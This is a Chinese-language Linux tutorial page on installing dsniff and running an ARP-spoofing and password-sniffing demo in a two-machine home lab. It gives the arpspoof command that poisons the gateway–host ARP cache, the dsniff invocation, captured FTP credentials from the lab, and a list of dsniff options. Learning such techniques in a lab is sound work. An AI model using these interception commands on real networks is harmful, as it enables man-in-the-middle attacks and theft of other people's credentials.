歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux基礎 >> Linux教程 >> Linux下的Dsniff嗅探淺析

Linux下的Dsniff嗅探淺析

日期:2017/2/28 16:04:10   编辑:Linux教程

關於dsniff的理論介紹在網上已經有很多的文章,個人看過之後覺得也十分的有收獲,這裡主要介紹的是在linux下實現嗅探的一個小實例!

操作平台一台Windowns 7的主機和一台安裝在vm ware下的一台linux主機,在linux主機上安裝配置dsniff和vasftp服務器,之後以此兩台主機為平台來實踐!

首先是在linux主機上的安裝和配置(配置好本機的Yum源即可,這裡只編譯安裝Berkeley_db)

這裡使用的套件分別為:Dsniff、libnet、libpcap、openssl、postgresql-libs、apr、Berkeley_db

[root@localhost ~]# yum -y install libnet
[root@localhost ~]# yum -y install libpcap

[root@localhost ~]# yum -y install postgresql-libs

[root@localhost ~]# yum -y install apr

[root@localhost ~]# yum -y install dsniff

[root@localhost ~]# yum -y install openssl

接著下載安裝Berkeley_db

Download (HTTP): http://download-east.oracle.com/berkeley-db/db-4.8.26.tar.gz

免費下載地址在 http://linux.linuxidc.com/

用戶名與密碼都是www.linuxidc.com

[root@localhost ~]# tar zxvf db-4.8.26.tar.gz

[root@localhost ~]# cd db-4.8.26/build_unix/

[root@localhost build_unix]# ../dist/configure --prefix=/usr --enable-compat185 --enable-cxx && make

[root@localhost build_unix]#make docdir=/usr/share/doc/db-4.8.26 install && chown -v -R root:root /usr/bin/berkeley_db_svc /usr/bin/db_* /usr/include/db{,_185,_cxx}.h /usr/lib/libdb{{,_cxx}.a,{,_cxx,_java,_tcl}-4.8.{so,a,la}} /usr/share/doc/db-4.8.26
接著是測試的部分

首先在linux虛擬機上打開兩個虛擬窗口

其中一個窗口進行arp欺騙

[root@localhost ~]# arpspoof -i eth0 -t 192.168.1.1 192.168.1.188(1為網關ip地址,188為windows主機的ip地址)

另外一個端口進行嗅探
[root@localhost ~]# dsniff -c -f /etc/dsniff/dsniff.services

接著在windows主機上登陸虛擬機Linux的vsftp服務器 (可以得到以下的嗅探數據)

[root@localhost ~]# dsniff -c -f /etc/dsniff/dsniff.services
dsniff: listening on peth0
-----------------
10/15/11 03:16:36 tcp 192.168.1.188.61983 -> 192.168.1.192.21 (ftp)
PASS 721wyzj
USER anonymous
PASS User@


總結,dsniff嗅探是一個雙方欺騙的原理,在兩台正常數據交互的主機之間展開欺騙,騙取雙方的數據,收集起來己用!

最後附錄dsniff的參數

-c 打開半雙工tcp流,允許在使用 arpspoof時進行正確的嗅探操作;
-d 啟動調試模式;
-f以/etc/service格式從文件中加載觸發器(也就是口令嗅探的
服務
類型);
-I使用特定的
網絡
接口;
-m 使用dsniff.magic文件通過在magic文件中定義的特征嘗試
自動
判斷協議;
-n 不執行主機查找;
-r 從前面保存的會話中讀取被嗅探的
數據

-s最多對報文的前個字節進行嗅探,如果用戶名和口令信息包含在隨後的默認1024字節界限中;
-t使用格式 port /proto =service;來加載一個以逗號界定的觸發器集;

Copyright © Linux教程網 All Rights Reserved